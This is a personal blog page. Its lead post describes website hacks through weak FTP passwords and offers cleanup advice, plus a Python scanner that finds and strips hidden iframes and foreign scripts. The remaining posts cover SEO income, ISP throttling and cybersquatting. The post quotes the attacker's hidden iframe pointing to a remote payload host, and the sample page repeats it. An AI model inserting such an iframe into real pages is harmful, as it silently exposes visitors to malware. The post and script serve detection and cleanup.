Brute Force FTP Password Hacking On The Rise
September 15, 2009 by Marko
At least six websites I provide support for have had malicious code embedded in their web pages in the last few months. The common entry point in every case has been the FTP login. Each site had a simple username/password combination and so was easy to get into. The hackers appear to be using an automated script to insert their code: every file whose name contains “index” or “default” gets modified, regardless of the extension (.htm, .html, .php, .asp, etc.) and regardless of whether the file is actually linked to from anywhere.
Commonly, an invisible iframe like the following gets inserted right after the <body> tag or else at the very end of the file:
<iframe src="http://3e0.ru:8080/index.php" width=160 height=188 style="visibility: hidden"></iframe>
The page on the remote site then delivers the real payload. Sometimes JavaScript is inserted instead of an iframe; again, that JavaScript only loads an external script file, and the external file contains the real payload.
Change the FTP password before cleaning up, otherwise the files will simply be reinfected. If your clients haven’t made recent backups, you will need to either remove the offending code snippets by hand or else write a script to do it for you (if many files are affected). If you leave the code in place or don’t remove it quickly enough, the site will end up on Google’s blacklist. Browsers like Firefox will then put up a big red warning page instead of showing the site. IE will continue to show the hacked pages and is probably the intended target of the malicious code in the first place. If your site does get blacklisted, you will need to request a review (re-scan) from Google.
The easiest way to avoid this hack is simply to make sure that all your (and your clients’) passwords are not overly simple. The password “password” is not a good choice, while “fuMrHack8” is a far better one. Bear in mind that plain FTP sends the username and password in cleartext, so a strong password only protects against guessing; where the host offers SFTP or FTPS, use that instead.
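The clean-up script mentioned above, as an added example (not the author’s own script): it walks a web root, looks only at files whose name contains “index” or “default” as the post describes, reports iframes hidden with an inline style and <script src> tags that load from hosts other than the site’s own, and with fix=True strips the hidden iframes in place. It goes slightly beyond the post in treating display:none as a hidden style too (an assumption; the post only shows visibility: hidden). The sample page and the hosts www.example.com / static.example.net are constructed for the demo. Files are read and written as latin-1, which round-trips every byte, so cleaning never mangles a non-UTF-8 page.

```python
"""Find and strip the hidden-iframe / foreign-script injection in index*/default* files.
Added example; the sample HTML and host names below are constructed, not from the post."""
from __future__ import annotations

import os
import re
import tempfile
from urllib.parse import urlparse

# Filenames the post says get hit: anything containing "index" or "default", any extension.
TARGET_NAME = re.compile(r"index|default", re.IGNORECASE)

# Whole <iframe> elements: self-closing form first, then open...close (newlines allowed inside).
IFRAME_RE = re.compile(r"<iframe\b[^>]*/>|<iframe\b[^>]*>.*?</iframe\s*>", re.IGNORECASE | re.DOTALL)

# visibility:hidden is what the post shows; display:none is a common variant (assumption).
HIDDEN_STYLE_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.IGNORECASE)

# src attribute of a <script> tag, quoted or unquoted. (?<![\w-]) avoids matching data-src.
SCRIPT_SRC_RE = re.compile(r"""<script\b[^>]*(?<![\w-])src\s*=\s*["']?([^"'\s>]+)""", re.IGNORECASE)

# Constructed sample: the post's iframe right after <body>, a legitimate embed, a site script
# and an injected external script (static.example.net is a made-up attacker host).
SAMPLE_PAGE = """<html><head><script src="/js/site.js"></script></head>
<body><iframe src="http://3e0.ru:8080/index.php" width=160 height=188 style="visibility: hidden"></iframe>
<p>Welcome</p>
<iframe src="https://www.youtube.com/embed/abc" width="560" height="315"></iframe>
<script src="http://static.example.net/p.js"></script>
</body></html>"""


def find_hidden_iframes(html: str) -> list[str]:
    """Return every iframe element whose inline style makes it invisible."""
    return [m.group(0) for m in IFRAME_RE.finditer(html) if HIDDEN_STYLE_RE.search(m.group(0))]


def find_foreign_scripts(html: str, allowed_hosts: set[str]) -> list[str]:
    """Return src URLs of <script> tags loaded from hosts outside allowed_hosts.
    Relative URLs (no host) belong to the site itself and are skipped."""
    allowed = {h.lower() for h in allowed_hosts}
    found = []
    for m in SCRIPT_SRC_RE.finditer(html):
        host = urlparse(m.group(1)).hostname
        if host and host.lower() not in allowed:
            found.append(m.group(1))
    return found


def strip_hidden_iframes(html: str) -> tuple[str, int]:
    """Remove hidden iframes only; visible ones (legitimate embeds) are left alone."""
    removed = 0

    def repl(m: re.Match) -> str:
        nonlocal removed
        if HIDDEN_STYLE_RE.search(m.group(0)):
            removed += 1
            return ""
        return m.group(0)

    return IFRAME_RE.sub(repl, html), removed


def scan_tree(root: str, allowed_hosts: set[str], fix: bool = False) -> dict[str, dict]:
    """Walk root, check index*/default* files, report findings; with fix=True strip hidden iframes.
    Foreign scripts are only reported, since some may be legitimate third-party includes."""
    report: dict[str, dict] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not TARGET_NAME.search(name):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:  # latin-1 preserves the original bytes
                html = fh.read()
            iframes = find_hidden_iframes(html)
            scripts = find_foreign_scripts(html, allowed_hosts)
            if not iframes and not scripts:
                continue
            report[path] = {"hidden_iframes": iframes, "foreign_scripts": scripts}
            if fix and iframes:
                cleaned, _ = strip_hidden_iframes(html)
                with open(path, "w", encoding="latin-1") as fh:
                    fh.write(cleaned)
    return report


def demo() -> tuple[dict[str, dict], str, str]:
    """Write the sample page as index.html and about.html in a temp dir, scan with fix=True.
    Returns (report, cleaned index.html, untouched about.html)."""
    root = tempfile.mkdtemp()
    for name in ("index.html", "about.html"):
        with open(os.path.join(root, name), "w", encoding="latin-1") as fh:
            fh.write(SAMPLE_PAGE)
    report = scan_tree(root, {"www.example.com"}, fix=True)
    with open(os.path.join(root, "index.html"), encoding="latin-1") as fh:
        index_after = fh.read()
    with open(os.path.join(root, "about.html"), encoding="latin-1") as fh:
        about_after = fh.read()
    return report, index_after, about_after


if __name__ == "__main__":
    found, _, _ = demo()
    for path, hits in found.items():
        print(path, hits)
```

Run it dry first (fix=False) and read the report before letting it write; the script deliberately leaves foreign scripts in place because a CDN or analytics include will look exactly like an injected one until you add its host to allowed_hosts.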
Easy Money
September 13, 2009 by Marko
Easy Money
Date: 2006-05-01 (transferred from old blog)
If you’ve spent any considerable amount of time on the Internet, you’ve probably tried making money on it. I basically make all my income from working on the Internet, specifically by programming the back-ends to client websites. As you may or may not know, most of my type of work is being outsourced to India and other low-wage countries, usually leaving people such as myself having to work more for less. This is where the lure of “easy money” comes in, as I have been researching internet marketing and search engine optimization techniques. These are hardly new concepts anymore and I may be a bit late to the game, but I think I’ll be giving it a go. I understand that there is no such thing as “easy money”, but for someone such as myself who lives on the Internet and knows all the related technologies, the work should not be very hard and perhaps a bit enjoyable. The work basically entails driving web traffic to sites that contain affiliate ads or pay-per-click ads. I have a number of websites I’ve created in the past just for fun but have never really tried to promote or monetize them. I will initially be concentrating on Desktop Linux At Home, Southern Ontario Day Trips and Cropping News. I am also going to be partnering with someone else trying to do some environmental affiliate sales sites.
Easy Money… one year later
Date: 2007-05-01 (transferred from old blog)
My experimentation with SEO ran out of steam about 4 months into it… but I did still manage to triple the income from the 3 sites I was concentrating on. The problem is that this is not saying much, as the sites were making very little to begin with. My advice: unless your websites are in a current hot niche market and you are ready to commit a lot of effort to your SEO, don’t quit your day job.
If you are interested in trying out SEO and ad marketing, I would recommend reading the forums daily at DigitalPoint.com.
Rogers Sucks!
September 13, 2009 by Marko
Why I think Rogers sucks
Date: 2005-12-09 (transferred from old blog)
I have been a subscriber to Rogers High Speed Internet service since 1998, having toughed it out through a lot of good and bad times with them. But in the last year service has really gotten bad. Internet access cuts in and out frequently… and it’s not just my computer, network card or router, as I always have a glance at the cable modem sitting on a desk beside me and see that the CABLE LED has gone out. Besides this, I use software called BitTorrent quite often. It is useful for downloading large files, specifically media and Linux distributions. For a fast Internet connection, BitTorrent has always been noticeably slow. I never really questioned it much and accepted it. About a month ago, my torrents stopped working altogether. I could not get the client to even make initial contact with a tracker (if you use BitTorrent, you’ll know what this means). So I called up Rogers support and asked if they are blocking BitTorrent traffic. The guy said “Umm, no, our bittorrents are running fine here”, meaning the guy at least knew what I was talking about, as he seemingly uses the software himself. Anyway, I started researching this on the Internet and found that Rogers does in fact throttle BitTorrent packets on their network, and is possibly doing rolling black-outs of BitTorrent traffic on certain IP blocks, which is probably what I was experiencing. Then last week I heard that they are discontinuing Usenet service. While I’m not a heavy Usenet user, I was alarmed at all the services that they are slowly eliminating. So, I started my quest for some other broadband Internet provider and ended up switching to a small local ISP (sentex.ca) who has been in business for a long time and about whom I’ve heard good things from friends. Yay, everything works again! And it’s fast! And cheaper than Rogers!
Now let me tell you how my Rogers cancellation call proceeded….
Rogers Agent: “I see you’ve been a customer for a long time, may I ask why you are leaving us?”
Me: “Well, my bittorrent software doesn’t work very well with your service… among other problems.”
RA: “I don’t know anything about this bittorrent, do you mind if I go ask someone and get back to you in a minute?”
Me: “Umm, OK. (waits on hold for 5 minutes)”
RA: “Ok, they’ve explained the situation to me. Yes, we do throttle bittorrent traffic because it slows down the Internet for everyone else.”
Me: “But you advertise 60G bandwidth up/down per month”
RA: “Yes, and I see that you don’t even use half of that amount”
Me: “I know, and you’re saying I shouldn’t even be using what I am using?”
RA: “No, you can use it, it’s just that this bittorrent slows down the connections for everyone”
Me: “So, you are saying we can have 60G up/down as long as it’s only email and web traffic?”
RA: “No, you can use whatever you like”
Me: “But I can’t, since you throttle bittorrent… I mean really Rogers doesn’t want users like me. Rogers wants people that will only ever use email and surf the web.”
RA: “Well, bittorrent slows down everybody else’s connection, so it isn’t fair to the other users.”
Me: “Well maybe Rogers should lower their bandwidth caps to not give the false impression that you might actually be able to use that amount!”
RA: “But you can use it”
on and on it went…
Anyway, long story short, Rogers wants only users who will stick to email and web; basically, users that have zero chance of using more than about 1% of their perceived 60G bandwidth limit. I guess if people using Rogers somehow started automating their browsers to continually hit random sites all day, they would have to start throttling and possibly blocking web traffic too!
Oh well, if they don’t want me or other power users, that’s fine. Bye-bye Rogers!
Cybersquatting For The Pope
September 13, 2009 by Marko
Cybersquatting
Date: 2005-04-20 (transferred from old blog)
Some clever fellow who followed the prophecies of St. Malachy registered the domain benedictxvi.com before the new pope was elected and is now getting tons of hits to his website (and probably making a nice profit with Google ads). I went to check whether any variations on that domain were still available but could find nothing. Even misspellings, such as benedictvxi.com and benedictxiv.com, are already taken. Then I looked for the “last pope” and found PeterII.com and all its variations already taken as well… even the Latin petrusromanus.com. Getting a good cybersquatting domain name is extremely difficult these days.